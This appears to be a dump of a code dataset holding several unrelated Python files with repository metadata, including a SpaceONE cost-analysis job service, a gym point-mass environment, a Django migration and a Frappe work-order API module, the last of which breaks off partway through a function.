        normalizers = T.set_subtensor(
            normalizers[(normalizers < min_divisor).nonzero()], 1.)

        if ndim == 3:
            new_X /= (normalizers[:, :, None] + 1e-6)
        else:
            new_X /= (normalizers[:, :, :, None] + 1e-6)

        return new_X

    def gaussian_filter(self, kernel_shape):
        """Return a kernel_shape x kernel_shape Gaussian kernel (sigma=2)
        normalized so the whole kernel sums to 1."""
        x = np.zeros((kernel_shape, kernel_shape), dtype='float32')

        def gauss(x, y, sigma=2.0):
            Z = 2 * np.pi * sigma**2
            return 1./Z * np.exp(-(x**2 + y**2) / (2. * sigma**2))

        mid = np.floor(kernel_shape / 2.)
        # FIX: range instead of Python-2-only xrange.
        for i in range(0, kernel_shape):
            for j in range(0, kernel_shape):
                x[i, j] = gauss(i-mid, j-mid)

        # FIX: the builtin sum() iterated rows (summing along axis 0 only),
        # normalizing each column independently and distorting the kernel;
        # np.sum normalizes by the total kernel mass as intended.
        return x / np.sum(x)

    def mean_filter(self, kernel_size):
        """Return a kernel_size x kernel_size box filter (entries 1/k^2)."""
        s = kernel_size**2
        x = np.repeat(1./s, s).reshape((kernel_size, kernel_size))
        return x
| 2,493 | 0 | 135 |
bac0de269fde429f9cebf9a8fb0045c804ea4c9c | 21,142 | py | Python | src/spaceone/cost_analysis/service/job_service.py | whdalsrnt/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | 2 | 2021-12-22T05:31:18.000Z | 2021-12-23T11:47:29.000Z | src/spaceone/cost_analysis/service/job_service.py | whdalsrnt/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | 9 | 2022-02-10T00:58:28.000Z | 2022-03-23T11:12:47.000Z | src/spaceone/cost_analysis/service/job_service.py | spaceone-dev/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | null | null | null | import copy
import datetime
import logging
from dateutil import rrule
from datetime import timedelta, datetime
from spaceone.core.service import *
from spaceone.core import utils, config
from spaceone.cost_analysis.error import *
from spaceone.cost_analysis.model.job_task_model import JobTask
from spaceone.cost_analysis.model.job_model import Job
from spaceone.cost_analysis.model.data_source_model import DataSource
from spaceone.cost_analysis.model.cost_model import CostQueryHistory
from spaceone.cost_analysis.manager.cost_manager import CostManager
from spaceone.cost_analysis.manager.job_manager import JobManager
from spaceone.cost_analysis.manager.job_task_manager import JobTaskManager
from spaceone.cost_analysis.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.cost_analysis.manager.data_source_manager import DataSourceManager
from spaceone.cost_analysis.manager.secret_manager import SecretManager
from spaceone.cost_analysis.manager.budget_manager import BudgetManager
from spaceone.cost_analysis.manager.budget_usage_manager import BudgetUsageManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
| 41.373777 | 129 | 0.597342 | import copy
import datetime
import logging
from dateutil import rrule
from datetime import timedelta, datetime
from spaceone.core.service import *
from spaceone.core import utils, config
from spaceone.cost_analysis.error import *
from spaceone.cost_analysis.model.job_task_model import JobTask
from spaceone.cost_analysis.model.job_model import Job
from spaceone.cost_analysis.model.data_source_model import DataSource
from spaceone.cost_analysis.model.cost_model import CostQueryHistory
from spaceone.cost_analysis.manager.cost_manager import CostManager
from spaceone.cost_analysis.manager.job_manager import JobManager
from spaceone.cost_analysis.manager.job_task_manager import JobTaskManager
from spaceone.cost_analysis.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.cost_analysis.manager.data_source_manager import DataSourceManager
from spaceone.cost_analysis.manager.secret_manager import SecretManager
from spaceone.cost_analysis.manager.budget_manager import BudgetManager
from spaceone.cost_analysis.manager.budget_usage_manager import BudgetUsageManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class JobService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cost_mgr: CostManager = self.locator.get_manager('CostManager')
self.job_mgr: JobManager = self.locator.get_manager('JobManager')
self.job_task_mgr: JobTaskManager = self.locator.get_manager('JobTaskManager')
self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
self.ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
@transaction(append_meta={'authorization.scope': 'SYSTEM'})
def create_jobs_by_data_source(self, params):
""" Create jobs by domain
Args:
params (dict): {}
Returns:
None
"""
for data_source_vo in self._get_all_data_sources():
try:
self._sync_data_source(data_source_vo)
except Exception as e:
_LOGGER.error(f'[create_jobs_by_data_source] sync error: {e}', exc_info=True)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['job_id', 'domain_id'])
def cancel(self, params):
""" Get job
Args:
params (dict): {
'job_id': 'str',
'domain_id': 'str'
}
Returns:
job_vo (object)
"""
job_id = params['job_id']
domain_id = params['domain_id']
job_vo = self.job_mgr.get_job(job_id, domain_id)
if job_vo.status != 'IN_PROGRESS':
raise ERROR_JOB_STATE(job_state=job_vo.status)
return self.job_mgr.change_canceled_status(job_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['job_id', 'domain_id'])
def get(self, params):
""" Get job
Args:
params (dict): {
'job_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
job_vo (object)
"""
job_id = params['job_id']
domain_id = params['domain_id']
return self.job_mgr.get_job(job_id, domain_id, params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['job_id', 'status', 'data_source_id', 'domain_id'])
@append_keyword_filter(['job_id'])
def list(self, params):
""" List jobs
Args:
params (dict): {
'job_id': 'str',
'status': 'str',
'data_source_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
job_vos (object)
total_count
"""
query = params.get('query', {})
return self.job_mgr.list_jobs(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@append_keyword_filter(['job_id'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.job_mgr.stat_jobs(query)
@transaction
@check_required(['task_options', 'job_task_id', 'domain_id'])
def get_cost_data(self, params):
"""Execute task to get cost data
Args:
params (dict): {
'task_options': 'dict',
'job_task_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
task_options = params['task_options']
job_task_id = params['job_task_id']
domain_id = params['domain_id']
job_task_vo: JobTask = self.job_task_mgr.get_job_task(job_task_id, domain_id)
job_id = job_task_vo.job_id
if self._is_job_canceled(job_id, domain_id):
self.job_task_mgr.change_canceled_status(job_task_vo)
else:
job_task_vo = self.job_task_mgr.change_in_progress_status(job_task_vo)
try:
data_source_vo: DataSource = self.data_source_mgr.get_data_source(job_task_vo.data_source_id, domain_id)
plugin_info = data_source_vo.plugin_info.to_dict()
secret_id = plugin_info.get('secret_id')
options = plugin_info.get('options', {})
schema = plugin_info.get('schema')
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(plugin_info, domain_id)
secret_data = self._get_secret_data(secret_id, domain_id)
self.ds_plugin_mgr.initialize(endpoint)
start_dt = datetime.utcnow()
count = 0
is_canceled = False
_LOGGER.debug(f'[get_cost_data] start job ({job_task_id}): {start_dt}')
for costs_data in self.ds_plugin_mgr.get_cost_data(options, secret_data, schema, task_options):
results = costs_data.get('results', [])
for cost_data in results:
count += 1
self._check_cost_data(cost_data)
self._create_cost_data(cost_data, job_task_vo)
if self._is_job_canceled(job_id, domain_id):
self.job_task_mgr.change_canceled_status(job_task_vo)
is_canceled = True
break
else:
job_task_vo = self.job_task_mgr.update_sync_status(job_task_vo, len(results))
if not is_canceled:
end_dt = datetime.utcnow()
_LOGGER.debug(f'[get_cost_data] end job ({job_task_id}): {end_dt}')
_LOGGER.debug(f'[get_cost_data] total job time ({job_task_id}): {end_dt - start_dt}')
self.job_task_mgr.change_success_status(job_task_vo, count)
except Exception as e:
self.job_task_mgr.change_error_status(job_task_vo, e)
self._close_job(job_id, domain_id)
def _get_secret_data(self, secret_id, domain_id):
    """Fetch the plugin's secret data; empty dict when no secret is configured."""
    secret_mgr: SecretManager = self.locator.get_manager('SecretManager')
    if not secret_id:
        return {}
    return secret_mgr.get_secret_data(secret_id, domain_id)
@staticmethod
def _check_cost_data(cost_data):
    """Validate that mandatory plugin cost fields are present."""
    for key in ('currency', 'billed_at'):
        if key not in cost_data:
            _LOGGER.error(f'[_check_cost_data] cost_data: {cost_data}')
            raise ERROR_REQUIRED_PARAMETER(key=f'plugin_cost_data.{key}')
def _create_cost_data(self, cost_data, job_task_vo):
    """Normalize one plugin cost record and persist it as a Cost document."""
    cost_data.update({
        'original_currency': cost_data.get('currency', 'USD'),
        'original_cost': cost_data.get('cost', 0),
        'job_id': job_task_vo.job_id,
        'data_source_id': job_task_vo.data_source_id,
        'domain_id': job_task_vo.domain_id,
    })
    # Plugins send billed_at as an ISO-8601 string; convert before saving.
    cost_data['billed_at'] = utils.iso8601_to_datetime(cost_data['billed_at'])
    self.cost_mgr.create_cost(cost_data, execute_rollback=False)
def _is_job_canceled(self, job_id, domain_id):
    """Return True when the job's current status is CANCELED."""
    job_vo: Job = self.job_mgr.get_job(job_id, domain_id)
    return job_vo.status == 'CANCELED'
def _close_job(self, job_id, domain_id):
    """Finalize the job once every one of its tasks has completed.

    Success path: delete superseded costs for each changed period,
    re-aggregate monthly costs, refresh budget usage and stat caches, and
    stamp the data source's last-sync time.  Error/cancel path: roll back
    the costs this job created.
    """
    job_vo: Job = self.job_mgr.get_job(job_id, domain_id)
    no_preload_cache = job_vo.options.get('no_preload_cache', False)

    # Only the last finishing task (no remaining tasks) closes the job.
    if job_vo.remained_tasks == 0:
        if job_vo.status == 'IN_PROGRESS':
            try:
                # Earliest changed start bounds the re-aggregation window.
                # NOTE(review): if job_vo.changed is empty, changed_start stays
                # None and _aggregate_cost_data would fail -- confirm upstream
                # guarantees at least one changed period.
                changed_start = None
                for changed_vo in job_vo.changed:
                    self._delete_changed_cost_data(job_vo, changed_vo.start, changed_vo.end)
                    if changed_start is None or changed_start > changed_vo.start:
                        changed_start = changed_vo.start

                self._aggregate_cost_data(job_vo, changed_start)
                self._update_budget_usage(domain_id)
                self.cost_mgr.remove_stat_cache(domain_id)

                if not no_preload_cache:
                    self._preload_cost_stat_queries(domain_id)

                self._update_last_sync_time(job_vo)
                self.job_mgr.change_success_status(job_vo)
            except Exception as e:
                self.job_mgr.change_error_status(job_vo, e)
                raise e
        elif job_vo.status == 'ERROR':
            self._rollback_cost_data(job_vo)
            self.job_mgr.update_job_by_vo({'finished_at': datetime.utcnow()}, job_vo)
        elif job_vo.status == 'CANCELED':
            self._rollback_cost_data(job_vo)
def _update_budget_usage(self, domain_id):
    """Recalculate cost usage for every budget in the domain."""
    budget_mgr: BudgetManager = self.locator.get_manager('BudgetManager')
    budget_usage_mgr: BudgetUsageManager = self.locator.get_manager('BudgetUsageManager')
    for budget_vo in budget_mgr.filter_budgets(domain_id=domain_id):
        budget_usage_mgr.update_cost_usage(budget_vo)
def _rollback_cost_data(self, job_vo: Job):
    """Delete every Cost record created by this (failed or cancelled) job."""
    cost_vos = self.cost_mgr.filter_costs(data_source_id=job_vo.data_source_id, domain_id=job_vo.domain_id,
                                          job_id=job_vo.job_id)
    _LOGGER.debug(f'[_close_job] delete cost data created by job: {job_vo.job_id} (count = {cost_vos.count()})')
    cost_vos.delete()
def _update_last_sync_time(self, job_vo: Job):
    """Stamp the data source with this job's creation time as the last sync."""
    # NOTE(review): this reassigns self.data_source_mgr as a side effect;
    # presumably the locator returns the same manager instance used
    # elsewhere -- confirm.
    self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
    data_source_vo = self.data_source_mgr.get_data_source(job_vo.data_source_id, job_vo.domain_id)
    self.data_source_mgr.update_data_source_by_vo({'last_synchronized_at': job_vo.created_at}, data_source_vo)
def _delete_changed_cost_data(self, job_vo: Job, start, end):
    """Delete superseded cost records inside a changed billing period.

    Removes costs billed at >= ``start`` (and < ``end`` when given) that
    were NOT written by the current job -- the current job's fresh records
    replace them.
    """
    query = {
        'filter': [
            {'k': 'billed_at', 'v': start, 'o': 'gte'},
            {'k': 'data_source_id', 'v': job_vo.data_source_id, 'o': 'eq'},
            {'k': 'domain_id', 'v': job_vo.domain_id, 'o': 'eq'},
            # Keep the current job's own records.
            {'k': 'job_id', 'v': job_vo.job_id, 'o': 'not'},
        ]
    }

    # An empty/None end means the changed period is open-ended.
    if end:
        query['filter'].append({'k': 'billed_at', 'v': end, 'o': 'lt'})

    _LOGGER.debug(f'[_delete_changed_cost_data] delete query: {query}')
    cost_vos, total_count = self.cost_mgr.list_costs(query)
    cost_vos.delete()
def _aggregate_cost_data(self, job_vo: Job, changed_start):
    """Rebuild monthly cost aggregates from ``changed_start``'s month onward."""
    data_source_id = job_vo.data_source_id
    domain_id = job_vo.domain_id
    job_id = job_vo.job_id

    # Aggregate whole months: snap the window start to the first of the month.
    changed_start = changed_start.replace(day=1)
    for dt in rrule.rrule(rrule.MONTHLY, dtstart=changed_start, until=datetime.utcnow()):
        billed_month = dt.strftime('%Y-%m')
        self._aggregate_monthly_cost_data(data_source_id, domain_id, job_id, billed_month)

    # Drop stale aggregates produced by previous jobs for the same window.
    self._delete_aggregated_cost_data(data_source_id, domain_id, job_id, changed_start)
def _aggregate_monthly_cost_data(self, data_source_id, domain_id, job_id, billed_month):
    """Aggregate one month of raw costs into MonthlyCost records.

    Groups costs by every dimension (provider, region, product, tags, ...)
    and sums usd_cost / usage_quantity, then stores one MonthlyCost per
    group tagged with this job's id.
    """
    query = {
        'aggregate': [
            {
                'group': {
                    'keys': [
                        {'key': 'provider', 'name': 'provider'},
                        {'key': 'region_code', 'name': 'region_code'},
                        {'key': 'region_key', 'name': 'region_key'},
                        {'key': 'category', 'name': 'category'},
                        {'key': 'product', 'name': 'product'},
                        {'key': 'account', 'name': 'account'},
                        {'key': 'usage_type', 'name': 'usage_type'},
                        {'key': 'resource_group', 'name': 'resource_group'},
                        {'key': 'resource', 'name': 'resource'},
                        {'key': 'tags', 'name': 'tags'},
                        {'key': 'additional_info', 'name': 'additional_info'},
                        {'key': 'service_account_id', 'name': 'service_account_id'},
                        {'key': 'project_id', 'name': 'project_id'},
                        {'key': 'data_source_id', 'name': 'data_source_id'},
                        {'key': 'billed_month', 'name': 'billed_month'},
                        {'key': 'billed_year', 'name': 'billed_year'},
                    ],
                    'fields': [
                        {'key': 'usd_cost', 'name': 'usd_cost', 'operator': 'sum'},
                        {'key': 'usage_quantity', 'name': 'usage_quantity', 'operator': 'sum'},
                    ]
                }
            }
        ],
        'filter': [
            {'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
            {'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
            {'k': 'billed_month', 'v': billed_month, 'o': 'eq'},
        ]
    }

    _LOGGER.debug(f'[_aggregate_monthly_cost_data] query: {query}')
    response = self.cost_mgr.stat_costs(query)
    results = response.get('results', [])
    for aggregated_cost_data in results:
        # Tag each aggregate with its origin so stale ones can be deleted later.
        aggregated_cost_data['data_source_id'] = data_source_id
        aggregated_cost_data['job_id'] = job_id
        aggregated_cost_data['domain_id'] = domain_id
        self.cost_mgr.create_monthly_cost(aggregated_cost_data)

    _LOGGER.debug(f'[_aggregate_monthly_cost_data] create monthly costs ({billed_month}): {job_id} (count = {len(results)})')
def _delete_aggregated_cost_data(self, data_source_id, domain_id, job_id, changed_start):
    """Delete stale MonthlyCost aggregates superseded by this job.

    Removes monthly aggregates from ``changed_start``'s month onward that
    were written by previous jobs; this job's fresh aggregates are kept.

    (Removed an unused ``changed_start_year`` local from the original.)
    """
    changed_start_month = changed_start.strftime('%Y-%m')

    # Delete Monthly Cost
    query = {
        'filter': [
            {'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
            {'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
            # Keep the aggregates this job just created.
            {'k': 'job_id', 'v': job_id, 'o': 'not'},
            {'k': 'billed_month', 'v': changed_start_month, 'o': 'gte'},
        ]
    }

    monthly_cost_vos, total_count = self.cost_mgr.list_monthly_costs(query)
    monthly_cost_vos.delete()

    _LOGGER.debug(f'[_delete_aggregated_cost_data] delete monthly costs after {changed_start_month}: {job_id}')
def _sync_data_source(self, data_source_vo: DataSource):
    """Create a collection job (and its tasks) for one external data source.

    Asks the plugin which tasks are needed since the last sync, creates a
    Job plus one JobTask per task, and pushes each task onto the work
    queue.  A source with a recent duplicate job is marked as failed; a
    source with no tasks is marked synced immediately.
    """
    data_source_id = data_source_vo.data_source_id
    domain_id = data_source_vo.domain_id

    endpoint = self.ds_plugin_mgr.get_data_source_plugin_endpoint_by_vo(data_source_vo)
    secret_id = data_source_vo.plugin_info.secret_id
    options = data_source_vo.plugin_info.options
    schema = data_source_vo.plugin_info.schema

    secret_data = self._get_secret_data(secret_id, domain_id)

    _LOGGER.debug(f'[create_jobs_by_data_source] sync data source: {data_source_id}')

    params = {'last_synchronized_at': data_source_vo.last_synchronized_at}

    self.ds_plugin_mgr.initialize(endpoint)
    tasks, changed = self.ds_plugin_mgr.get_tasks(options, secret_data, schema, params)

    _LOGGER.debug(f'[sync] get_tasks: {tasks}')
    _LOGGER.debug(f'[sync] changed: {changed}')

    # Add Job Options
    job_vo = self.job_mgr.create_job(data_source_id, domain_id, {}, len(tasks), changed)

    if self._check_duplicate_job(data_source_id, domain_id, job_vo):
        self.job_mgr.change_error_status(job_vo, ERROR_DUPLICATE_JOB(data_source_id=data_source_id))
    else:
        if len(tasks) > 0:
            for task in tasks:
                job_task_vo = None
                task_options = task['task_options']
                try:
                    job_task_vo = self.job_task_mgr.create_job_task(job_vo.job_id, data_source_id, domain_id,
                                                                    task_options)
                    self.job_task_mgr.push_job_task({
                        'task_options': task_options,
                        'job_task_id': job_task_vo.job_task_id,
                        'domain_id': domain_id
                    })
                except Exception as e:
                    # NOTE(review): failures are recorded only when the JobTask
                    # was created; failures in create_job_task itself are
                    # silently swallowed here -- confirm that is intended.
                    if job_task_vo:
                        self.job_task_mgr.change_error_status(job_task_vo, e)
        else:
            # Nothing to collect: the job succeeds immediately.
            job_vo = self.job_mgr.change_success_status(job_vo)
            self.data_source_mgr.update_data_source_by_vo({'last_synchronized_at': job_vo.created_at},
                                                          data_source_vo)
def _get_all_data_sources(self):
    """Return every ENABLED data source of type EXTERNAL."""
    return self.data_source_mgr.filter_data_sources(
        state='ENABLED',
        data_source_type='EXTERNAL',
    )
def _check_duplicate_job(self, data_source_id, domain_id, this_job_vo: Job):
    """Return True when another recent IN_PROGRESS job exists for the source.

    Jobs older than 10 minutes are treated as stale and are cancelled
    instead of blocking the new job.
    """
    query = {
        'filter': [
            {'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
            {'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
            {'k': 'status', 'v': 'IN_PROGRESS', 'o': 'eq'},
            # Exclude the job we are about to run.
            {'k': 'job_id', 'v': this_job_vo.job_id, 'o': 'not'},
        ]
    }

    job_vos, total_count = self.job_mgr.list_jobs(query)

    duplicate_job_time = datetime.utcnow() - timedelta(minutes=10)

    for job_vo in job_vos:
        if job_vo.created_at >= duplicate_job_time:
            return True
        else:
            self.job_mgr.change_canceled_status(job_vo)

    return False
def _preload_cost_stat_queries(self, domain_id):
    """Warm the stat cache for cost queries used within the cache window."""
    cost_query_cache_time = config.get_global('COST_QUERY_CACHE_TIME', 7)  # in days
    cache_time = datetime.utcnow() - timedelta(days=cost_query_cache_time)

    # Only replay queries that were actually used inside the window.
    query = {
        'filter': [
            {'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
            {'k': 'updated_at', 'v': cache_time, 'o': 'gte'},
        ]
    }

    _LOGGER.debug(f'[_preload_cost_stat_queries] cost_query_cache_time: {cost_query_cache_time} days')

    history_vos, total_count = self.cost_mgr.list_cost_query_history(query)
    for history_vo in history_vos:
        _LOGGER.debug(f'[_preload_cost_stat_queries] create query cache: {history_vo.query_hash}')
        self._create_cache_by_history(history_vo, domain_id)
def _create_cache_by_history(self, history_vo: CostQueryHistory, domain_id):
    """Warm the stat cache for a previously executed cost query."""
    # Re-run the query over its original date range; deep-copy so the stored
    # query options are never mutated.
    self._create_cache(
        copy.deepcopy(history_vo.query_options),
        history_vo.granularity,
        history_vo.start,
        history_vo.end,
        domain_id,
    )
def _create_cache(self, query, granularity, start, end, domain_id):
    """Run (and thereby cache) the stat query over the given date range."""
    query = self.cost_mgr.add_date_range_filter(query, granularity, start, end)
    query_hash = utils.dict_to_hash(query)

    # Monthly-resolution ranges hit the pre-aggregated monthly collection.
    if self.cost_mgr.is_monthly_cost(granularity, start, end):
        self.cost_mgr.stat_monthly_costs_with_cache(query, query_hash, domain_id)
    else:
        self.cost_mgr.stat_costs_with_cache(query, query_hash, domain_id)
| 13,524 | 6,375 | 22 |
c343b4b46e44c45b2d46e35a4d1c43f3239bbcc0 | 335 | py | Python | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | # TODO: временный файл - удалить
s = "программа"
s2 = 'продукт'
print(s)
print(s2)
# Demonstrate escape sequences: \n is a newline, \t is a tab.
print("Программа 1\nПрограмма 2\nПрограмма 3\n\tЧасть 1\n\tЧасть 2")
print(len("12345\n"))
print("""Программа 1
Программа 2
Программа 3
Часть 1
Часть 2""")
print(r"Программа 1\nПрограмма 2") | 16.75 | 68 | 0.689552 | # TODO: временный файл - удалить
s = "программа"
s2 = 'продукт'
print(s)
print(s2)
# Demonstrate escape sequences: \n is a newline, \t is a tab.
print("Программа 1\nПрограмма 2\nПрограмма 3\n\tЧасть 1\n\tЧасть 2")
print(len("12345\n"))
print("""Программа 1
Программа 2
Программа 3
Часть 1
Часть 2""")
print(r"Программа 1\nПрограмма 2") | 0 | 0 | 0 |
0288f8ba32a91417b7204c9c3f6f6b75ee76504a | 441 | py | Python | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | 1 | 2022-03-19T22:50:12.000Z | 2022-03-19T22:50:12.000Z | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | null | null | null | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | null | null | null | # 2. (Função sem retorno sem parâmetro) Faça uma função/método que leia dois valores positivos e apresente a soma dos N números existentes entre eles (inclusive).
main()
| 23.210526 | 162 | 0.641723 | # 2. (Função sem retorno sem parâmetro) Faça uma função/método que leia dois valores positivos e apresente a soma dos N números existentes entre eles (inclusive).
def soma_intervalo(a, b):
    """Return the sum of every integer between a and b, inclusive.

    Works in either order (a <= b or a > b); the original only summed
    correctly when the first value was the smaller one.
    """
    lo, hi = (a, b) if a <= b else (b, a)
    return sum(range(lo, hi + 1))


def somarNumeros():
    """Read two positive integers and print the sum of the range between them."""
    a = int(input('Digite o primeiro número: '))
    b = int(input('Digite o segundo número: '))
    soma = soma_intervalo(a, b)
    print()
    print('Soma: {}'.format(soma))


def main():
    somarNumeros()


# Guard the entry point so importing this module does not prompt for input.
if __name__ == '__main__':
    main()
| 221 | 0 | 46 |
d79ec329aaf068bcca9a05de11b446cd847d02ae | 1,354 | py | Python | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2020-10-23T14:40:09.000Z | 2020-10-23T14:40:09.000Z | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | null | null | null | rlkit/envs/simple/point.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2021-05-27T20:38:45.000Z | 2021-05-27T20:38:45.000Z | import os
from gym import spaces
import numpy as np
import gym
class Point(gym.Env):
"""Superclass for all MuJoCo environments.
"""
@property
@property
| 26.54902 | 64 | 0.565731 | import os
from gym import spaces
import numpy as np
import gym
class Point(gym.Env):
    """An n-dimensional point-mass goal-reaching environment.

    The agent's state and the goal both live in the box [-5, 5]^n.  Actions
    are clipped to [-1, 1], scaled by ``action_scale`` and added to the
    state; the reward is the negative Euclidean distance to the goal.
    Observations are the concatenation of state and goal (length 2n).
    """

    def __init__(self, n=2, action_scale=0.2, fixed_goal=None):
        self.fixed_goal = fixed_goal
        self.n = n
        self.action_scale = action_scale
        self.goal = np.zeros((n,))
        self.state = np.zeros((n,))

    @property
    def action_space(self):
        ones = np.ones((self.n,))
        return spaces.Box(low=-ones, high=ones)

    @property
    def observation_space(self):
        bound = 5 * np.ones((2 * self.n,))
        return spaces.Box(low=-bound, high=bound)

    def reset(self):
        self.state = np.zeros((self.n,))
        if self.fixed_goal is None:
            # Sample a fresh goal uniformly from the state box.
            self.goal = np.random.uniform(-5, 5, size=(self.n,))
        else:
            self.goal = np.array(self.fixed_goal)
        return self._get_obs()

    def step(self, action):
        delta = np.clip(action, -1, 1) * self.action_scale
        self.state = np.clip(self.state + delta, -5, 5)
        reward = -np.linalg.norm(self.state - self.goal)
        return self._get_obs(), reward, False, {}

    def _get_obs(self):
        return np.concatenate([self.state, self.goal])
| 1,022 | 0 | 160 |
bffaddba3f2b361de8e78c90bf1fe7fb63f04d5d | 466 | py | Python | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 1 | 2020-12-12T07:41:11.000Z | 2020-12-12T07:41:11.000Z | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 9 | 2019-12-31T09:30:23.000Z | 2022-01-13T00:49:47.000Z | internos/users/migrations/0005_user_skype_account.py | UNICEFLebanonInnovation/Staging-Neuro | aac1e4f335ff4ec32041f989a9c22f8581a4961a | [
"MIT"
] | 1 | 2020-02-03T13:12:55.000Z | 2020-02-03T13:12:55.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2019-01-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
| 22.190476 | 63 | 0.622318 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2019-01-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional ``skype_account`` text field to the custom User model."""

    dependencies = [
        ('users', '0004_section_powerbi_url'),
    ]

    operations = [
        # Free-text Skype handle; optional (blank=True), up to 255 characters.
        migrations.AddField(
            model_name='user',
            name='skype_account',
            field=models.CharField(blank=True, max_length=255),
        ),
    ]
| 0 | 287 | 23 |
6c16d8d444a19e1eefc34f7c842e092d007d5c3d | 4,102 | py | Python | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | null | null | null | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | null | null | null | tools_box/controllers/api.py | maisonarmani/Tools_Box | 4f8cc3a0deac1be50a3ac80758a10608faf58454 | [
"MIT"
] | 1 | 2022-01-30T12:15:41.000Z | 2022-01-30T12:15:41.000Z | # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from frappe.utils import cstr, flt, getdate, comma_and, cint, nowdate, add_days
import datetime
from frappe import sendmail
@frappe.whitelist()
@frappe.whitelist()
@frappe.whitelist()
@frappe.whitelist()
def resolve_work_order(docname):
    """Mark a Work Order as Resolved.  Called from the client on Stop/Unstop.

    Updates the row directly with SQL (bypassing document validation) after
    verifying the caller has write permission on Work Order.  Returns True.

    Security fix: ``docname`` is passed as a bound parameter instead of
    being interpolated into the SQL string (SQL injection).
    """
    status = 'Resolved'
    if not frappe.has_permission("Work Order", "write"):
        frappe.throw(_("Not permitted"), frappe.PermissionError)
    frappe.db.sql(
        """update `tabWork Order`
        set status = 'Resolved', modified = %s, modified_by = %s, skip_transfer = 1
        where name = %s""",
        (datetime.datetime.now(), frappe.session.user, docname))
    frappe.msgprint(_("Work Order has been {0}").format(status))
    return True
@frappe.whitelist()
@frappe.whitelist()
| 33.900826 | 128 | 0.663579 | # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.utils import get_fetch_values
from frappe.model.mapper import get_mapped_doc
from frappe.utils import cstr, flt, getdate, comma_and, cint, nowdate, add_days
import datetime
from frappe import sendmail
@frappe.whitelist()
def get_active_employees(doctype, txt, searchfield, start, page_len, filters):
    """Link-field query: search employees who have not left.

